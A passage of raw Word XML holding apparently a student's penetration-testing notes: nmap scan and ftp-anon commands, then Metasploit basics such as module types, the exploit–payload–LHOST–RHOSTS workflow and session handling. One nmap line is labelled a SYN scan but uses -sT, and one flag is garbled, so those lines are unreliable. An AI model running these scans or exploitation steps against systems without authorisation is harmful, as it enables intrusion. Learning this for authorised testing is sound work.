      <w:r w:rsidR="00A453D3" w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4298114F" w14:textId="20D074DE" w:rsidR="00A453D3" w:rsidRPr="0084205E" w:rsidRDefault="00A453D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Perform a TCP SYN scan on the first 5000 ports of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>taget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7820214B" w14:textId="2A7163F4" w:rsidR="00A453D3" w:rsidRPr="0084205E" w:rsidRDefault="00A453D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Input: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p1-5000 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B145C75" w14:textId="1E94CB88" w:rsidR="00A453D3" w:rsidRPr="0084205E" w:rsidRDefault="00A453D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Deploy the ftp-anon script against the box. Can </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> login successfully to the FTP server on port 21?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78908089" w14:textId="113CB653" w:rsidR="00440B89" w:rsidRPr="0084205E" w:rsidRDefault="00A453D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Input: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00440B89" w:rsidRPr="0084205E">
        <w:t>p21 - - script=ftp-anon -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00440B89" w:rsidRPr="0084205E">
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00440B89" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00440B89" w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00440B89" w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612B4E84" w14:textId="64F55BAF" w:rsidR="00440B89" w:rsidRPr="0084205E" w:rsidRDefault="00440B89" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730EFF5B" w14:textId="77777777" w:rsidR="004C083A" w:rsidRPr="0084205E" w:rsidRDefault="001A3015" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33753F63" w14:textId="647B8E4D" w:rsidR="001A3015" w:rsidRPr="0084205E" w:rsidRDefault="00E17FE5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Initialize </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C985D5A" w14:textId="69DE4BFE" w:rsidR="00E17FE5" w:rsidRPr="0084205E" w:rsidRDefault="00E17FE5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -h = help or “?”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B34830" w14:textId="5D5F6C2C" w:rsidR="00E17FE5" w:rsidRPr="0084205E" w:rsidRDefault="00E17FE5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="079764BB" w14:textId="689E2F71" w:rsidR="00E17FE5" w:rsidRPr="0084205E" w:rsidRDefault="00E17FE5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Db_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="178EFDC3" w14:textId="322A284D" w:rsidR="00E17FE5" w:rsidRPr="0084205E" w:rsidRDefault="00E17FE5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F5ED63F" w14:textId="21E75666" w:rsidR="00E17FE5" w:rsidRPr="0084205E" w:rsidRDefault="00E17FE5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Search = </w:t>
      </w:r>
      <w:r w:rsidR="00BD7A1D" w:rsidRPr="0084205E">
        <w:t>used for searching modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EA5761" w14:textId="67748D6F" w:rsidR="00BD7A1D" w:rsidRPr="0084205E" w:rsidRDefault="00BD7A1D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use = select module as active module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D62C771" w14:textId="6FC15202" w:rsidR="00BD7A1D" w:rsidRPr="0084205E" w:rsidRDefault="00BD7A1D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Connect = netcat like function to make quick connection to a host to verify one can talk to it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6674191A" w14:textId="64909246" w:rsidR="00BD7A1D" w:rsidRPr="0084205E" w:rsidRDefault="00BD7A1D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Set = change value of a variable – common command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19488144" w14:textId="293A1C50" w:rsidR="00BD7A1D" w:rsidRPr="0084205E" w:rsidRDefault="00BD7A1D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Setg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> = change value of a global variable – common command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355CF557" w14:textId="7ECADA2A" w:rsidR="00BD7A1D" w:rsidRPr="0084205E" w:rsidRDefault="00BD7A1D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unset – change variable to null/no value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47207FB5" w14:textId="49401525" w:rsidR="00BD7A1D" w:rsidRPr="0084205E" w:rsidRDefault="004C083A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Spool – write console output into a file as well as the screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CC5DCF" w14:textId="6E4EF057" w:rsidR="004C083A" w:rsidRPr="0084205E" w:rsidRDefault="004C083A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Save – store settings/active datastores from Metasploit to a savings file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65672354" w14:textId="699A5F80" w:rsidR="0018592E" w:rsidRPr="0084205E" w:rsidRDefault="0018592E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Load – load different modules, framework plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E8DBE2" w14:textId="772B5097" w:rsidR="004C083A" w:rsidRPr="0084205E" w:rsidRDefault="004C083A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Six Core Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BFB913" w14:textId="51C00726" w:rsidR="004C083A" w:rsidRPr="0084205E" w:rsidRDefault="004C083A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploit – most common module utilized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37122DDE" w14:textId="3015D8CC" w:rsidR="004C083A" w:rsidRPr="0084205E" w:rsidRDefault="004C083A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r w:rsidR="0018592E" w:rsidRPr="0084205E">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0018592E" w:rsidRPr="0084205E">
        <w:t>contains shellcode to be executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E72D40F" w14:textId="0BEDB4F7" w:rsidR="004C083A" w:rsidRPr="0084205E" w:rsidRDefault="004C083A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Encoder</w:t>
      </w:r>
      <w:r w:rsidR="0018592E" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – modify appearance of exploit to avoid signature detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C03051B" w14:textId="76993338" w:rsidR="004C083A" w:rsidRPr="0084205E" w:rsidRDefault="004C083A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>NOP</w:t>
      </w:r>
      <w:r w:rsidR="0018592E" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – used with buffer overflow and ROP attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0BAB4D" w14:textId="0F1E4AB3" w:rsidR="004C083A" w:rsidRPr="0084205E" w:rsidRDefault="004C083A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Auxiliary</w:t>
      </w:r>
      <w:r w:rsidR="0018592E" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – scanning and verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA1E06A" w14:textId="624E9ED2" w:rsidR="004C083A" w:rsidRPr="0084205E" w:rsidRDefault="0018592E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Post – looting and pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2FB8A6" w14:textId="40C5312A" w:rsidR="0018592E" w:rsidRPr="0084205E" w:rsidRDefault="0018592E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Metasploit comes with </w:t>
      </w:r>
      <w:r w:rsidR="00EF07F9" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">built-in method to run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF07F9" w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67FBF7F0" w14:textId="28C2558A" w:rsidR="00511564" w:rsidRPr="0084205E" w:rsidRDefault="00511564" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">PICK EXPLOIT </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> PICK PAYLOAD </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> LHOST </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> RHOSTS </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> EXPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB69602" w14:textId="55947746" w:rsidR="00EF07F9" w:rsidRPr="0084205E" w:rsidRDefault="00EF07F9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>db_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353F42F5" w14:textId="51175E88" w:rsidR="00EF07F9" w:rsidRPr="0084205E" w:rsidRDefault="00EF07F9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hosts command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08926991" w14:textId="6BEEF5C7" w:rsidR="00EF07F9" w:rsidRPr="0084205E" w:rsidRDefault="00EF07F9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Services command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4957D631" w14:textId="201B7C62" w:rsidR="00EF07F9" w:rsidRPr="0084205E" w:rsidRDefault="00EF07F9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1831C95D" w14:textId="2C5EE63A" w:rsidR="00EF07F9" w:rsidRPr="0084205E" w:rsidRDefault="00EF07F9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>exploitname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB308A6" w14:textId="3D5BC0E2" w:rsidR="00CA0E88" w:rsidRPr="0084205E" w:rsidRDefault="00CA0E88" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8CDD3C" w14:textId="66060035" w:rsidR="00CA0E88" w:rsidRPr="0084205E" w:rsidRDefault="00CA0E88" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Set LHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F42E360" w14:textId="15145039" w:rsidR="00CA0E88" w:rsidRPr="0084205E" w:rsidRDefault="00CA0E88" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Set RHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677772AD" w14:textId="5525FDAE" w:rsidR="00CA0E88" w:rsidRPr="0084205E" w:rsidRDefault="00CA0E88" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploit or run -j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D81DF0B" w14:textId="5EABF054" w:rsidR="00CA0E88" w:rsidRPr="0084205E" w:rsidRDefault="00CA0E88" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Jobs command to check active jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052FABAC" w14:textId="7B0111CE" w:rsidR="00CA0E88" w:rsidRPr="0084205E" w:rsidRDefault="00CA0E88" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sessions to list all sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73150EF5" w14:textId="09854C40" w:rsidR="00CA0E88" w:rsidRPr="0084205E" w:rsidRDefault="00CA0E88" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Interact via sessions -I &lt;session number&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CAE4A0" w14:textId="1721833D" w:rsidR="00CA0E88" w:rsidRPr="0084205E" w:rsidRDefault="005A7C76" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
